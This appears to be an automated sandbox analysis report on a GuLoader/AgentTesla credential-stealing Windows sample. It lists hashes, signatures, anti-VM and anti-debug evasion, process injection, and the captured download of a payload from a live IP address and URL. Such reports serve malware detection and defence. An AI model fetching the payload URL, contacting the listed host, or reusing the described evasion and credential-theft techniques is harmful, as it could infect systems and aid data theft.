Analysis Report SKM_C3350191107102300.exe

Overview

General Information

Sample Name: SKM_C3350191107102300.exe
Analysis ID: 356107
MD5: 58bb0368bc9cf6ec86c266f54cdefeeb
SHA1: 1b9beee4bf56a4d5b31654b7c7404df5ff13f2fe
SHA256: d8eb1f98c2e365646d4b849ce9463769f173f7b4c95ea4dc705429a1798e1cfb
Tags: GuLoader

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: SKM_C3350191107102300.exe Virustotal: Detection: 21% Perma Link

Compliance:

barindex
Uses 32bit PE files
Source: SKM_C3350191107102300.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.6:49726 -> 185.222.58.152:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /EDUORIGIN_baxLdLkc20.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.222.58.152Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.152
Source: global traffic HTTP traffic detected: GET /EDUORIGIN_baxLdLkc20.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.222.58.152Cache-Control: no-cache
Source: RegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe String found in binary or memory: http://185.222.58.152/EDUORIGIN_baxLdLkc20.bin
Source: RegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp String found in binary or memory: http://sHYyUE.com
Source: RegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

System Summary:

barindex
Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Contains functionality to call native functions
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_021066CF NtMapViewOfSection, 0_2_021066CF
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02106A5A NtMapViewOfSection, 0_2_02106A5A
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02106A7E NtMapViewOfSection, 0_2_02106A7E
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02106A9A NtMapViewOfSection, 0_2_02106A9A
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02106AB6 NtMapViewOfSection, 0_2_02106AB6
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02106ADE NtMapViewOfSection, 0_2_02106ADE
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02106B0A NtMapViewOfSection, 0_2_02106B0A
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02106B2E NtMapViewOfSection, 0_2_02106B2E
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_0210677A NtProtectVirtualMemory,NtMapViewOfSection, 0_2_0210677A
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02106B7A NtMapViewOfSection, 0_2_02106B7A
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02106B9E NtMapViewOfSection, 0_2_02106B9E
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02106BBA NtMapViewOfSection, 0_2_02106BBA
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02106BE2 NtMapViewOfSection, 0_2_02106BE2
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_0210680C NtProtectVirtualMemory,NtMapViewOfSection, 0_2_0210680C
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02106C32 NtMapViewOfSection, 0_2_02106C32
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_0210687F NtProtectVirtualMemory,NtMapViewOfSection, 0_2_0210687F
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02106896 NtMapViewOfSection, 0_2_02106896
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02106CAA NtMapViewOfSection, 0_2_02106CAA
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_0210693E NtMapViewOfSection, 0_2_0210693E
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_0210698E NtMapViewOfSection, 0_2_0210698E
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_021069AA NtMapViewOfSection, 0_2_021069AA
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_021069D6 NtMapViewOfSection, 0_2_021069D6
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_021069F6 NtMapViewOfSection, 0_2_021069F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_0130693A NtSetInformationThread, 4_2_0130693A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_013063BF NtProtectVirtualMemory, 4_2_013063BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_013069AA NtSetInformationThread, 4_2_013069AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_0130698E NtSetInformationThread, 4_2_0130698E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_013069F6 NtSetInformationThread, 4_2_013069F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_013069D6 NtSetInformationThread, 4_2_013069D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_01306B2E NtSetInformationThread, 4_2_01306B2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_01306B0A NtSetInformationThread, 4_2_01306B0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_01306B7A NtSetInformationThread, 4_2_01306B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_01306BBA NtSetInformationThread, 4_2_01306BBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_01306B9E NtSetInformationThread, 4_2_01306B9E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_01306BE2 NtSetInformationThread, 4_2_01306BE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_01306A7E NtSetInformationThread, 4_2_01306A7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_01306A5A NtSetInformationThread, 4_2_01306A5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_01306AB6 NtSetInformationThread, 4_2_01306AB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_01306A9A NtSetInformationThread, 4_2_01306A9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_01306ADE NtSetInformationThread, 4_2_01306ADE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_01306C32 NtSetInformationThread, 4_2_01306C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_01306CAA NtSetInformationThread, 4_2_01306CAA
Detected potential crypto function
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00FE78D8 4_2_00FE78D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00FE41E8 4_2_00FE41E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00FE99C0 4_2_00FE99C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00FE12F8 4_2_00FE12F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00FEE588 4_2_00FEE588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00FE41E0 4_2_00FE41E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_1D972CD8 4_2_1D972CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_1D970006 4_2_1D970006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_1D970040 4_2_1D970040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_1D97C3B0 4_2_1D97C3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_1D9805D8 4_2_1D9805D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_1DB146A0 4_2_1DB146A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_1DB14690 4_2_1DB14690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_1DB14650 4_2_1DB14650
PE file contains strange resources
Source: SKM_C3350191107102300.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: SKM_C3350191107102300.exe, 00000000.00000002.387312508.00000000020B0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs SKM_C3350191107102300.exe
Source: SKM_C3350191107102300.exe, 00000000.00000000.329778630.000000000040F000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameKlysnerstorv8.exe vs SKM_C3350191107102300.exe
Source: SKM_C3350191107102300.exe Binary or memory string: OriginalFilenameKlysnerstorv8.exe vs SKM_C3350191107102300.exe
Tries to load missing DLLs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Uses 32bit PE files
Source: SKM_C3350191107102300.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@4/0@0/1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_01
Source: SKM_C3350191107102300.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: SKM_C3350191107102300.exe Virustotal: Detection: 21%
Source: unknown Process created: C:\Users\user\Desktop\SKM_C3350191107102300.exe 'C:\Users\user\Desktop\SKM_C3350191107102300.exe'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\SKM_C3350191107102300.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\SKM_C3350191107102300.exe' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6504, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_00408C00 push 0000001Eh; iretd 0_2_00408C0F
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_00403EDA push edi; retf 0_2_00403F29
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02105A4A push es; ret 0_2_02105A7C
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02105A71 push es; ret 0_2_02105A7C
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02101CBE push ss; retf 0_2_02101D39
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_021008AB push edx; ret 0_2_021008AC
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02101CD6 push ss; retf 0_2_02101D39
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02101D1C push ss; retf 0_2_02101D39
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02101D1C push ss; retf 0_2_02101D49
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02101D3E push ss; retf 0_2_02101D49
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_02101D28 push ss; retf 0_2_02101D39
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_021045B1 push ebx; retf 0_2_021045DA
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Code function: 0_2_021005AF push cs; retf 0_2_021005B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_1D979E4C push E8FFFFFFh; retf 4_2_1D979E51
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_0130210C 4_2_0130210C
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
